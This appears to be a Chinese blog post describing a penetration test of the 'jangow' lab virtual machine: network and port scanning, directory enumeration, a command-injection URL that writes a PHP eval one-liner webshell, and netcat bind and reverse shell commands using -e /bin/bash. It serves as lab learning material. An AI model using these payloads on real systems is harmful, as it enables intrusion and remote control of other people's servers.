靶机环境 jangow入侵过程(2) 一句话木马 +反弹shell

** 测试 VMware不能识别网卡启动 使用virtualbox, 使用box 的桥接方式,放到物理网络,dhcp自动获取IP,看dhcp 找到IP地址**

netdiscover -r 10.0.0.0/24  -i eth0   扫描主机网段


nmap -sC -sV -p - 10.0.0.162 -v   扫描单个主机



# 使用gobuster 扫描一下 目录

apt-cache show gobuster   # 查看一下gobuster 的版本 
Package: gobuster
Version: 3.1.0-0kali1
Architecture: amd64
Maintainer: Kali Developers <devel@kali.org>
Installed-Size: 7404
Depends: libc6 (>= 2.4)

gobuster -h    # 查看一下gobuster帮助                                        
Command 'gobuster' not found, but can be installed with:
apt install gobuster
Do you want to install it? (N/y)y  #哦?? 没有安装,  那安装一下 
apt install gobuster
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成                 
下列【新】软件包将被安装:


#  使用一下

image-20220812085212977

image-20220811101954590

Ox01 情况分析!

# 能够执行远程系统命令的话,有三种渗透手法
# 1、使用系统命令查找敏感文件,找到系统用户 或者密码文件,远程登录系统 (上一篇使用的这种方式,缺点的 真实环境的话不可能登录console控制台)
# 2、使用文件上传漏洞,上传webshell  拿到控制权
# 3、使用执行命令反弹shell 拿到控制权

Ox02 文件上传

使用一句话木马 写入文件  <?php eval($_POST["333"]);?>

            
windows 下写入  echo ^<?php eval($_POST["123"]);?^> >1.php    ^是为了转义 大于号的 ,不能使用引号 或者 \ 反斜线

linux 下写入 $符号变量的问题     echo '<?php eval($_POST["123"]);?>'>1.php

http://192.168.10.184/site/busque.php?buscar=echo '<?php eval($_POST["123"]);?>'>1.php


# 游览器写入 或者 burp 写入都可以(注意编码一下)
https://github.com/eastmountyxz/AntSword-Experiment

image-20220811154801200

image-20220811154843359

image-20220811154746204

image-20220811155648882

上传大马 ,,好像不大行  访问不到!!!!

server端口开启监听

nc -lvnp  4444  -e /bin/bash     
开启192.168.1.1 的监听端口444  并且把本机的 shell 给到任何连进来的机器 
# 主动把shell 推送给其他人 ,别人只要链接到我就可以

nc  -v 192.168.1.1 4444
链接192.168.1.1的端口,并且接受对方的控制shell
# 链接到服务端,并且接受对方的shell ,控制远端电脑



nc -lvnp  4444
开启192.168.1.1 的监听端口444 
nc  -v 192.168.1.1 4444 -e /bin/bash
# CenOS ubuntu 等其他版本不能使用-e 参数   https://github.com/swisskyrepo/PayloadsAllTheThings 可以使用 bash python 等解释器

谁提供端口的监听 ,谁作为主发起者
谁把自己的程序暴露出来 ,谁作为被控端




只能走提权的老路!!!!

** 443 端口无法反弹shell php 解释器无法执行**

image-20220811182614138

posted @ 2022-08-10 18:43  mmszxc  阅读(160)  评论(0)    收藏  举报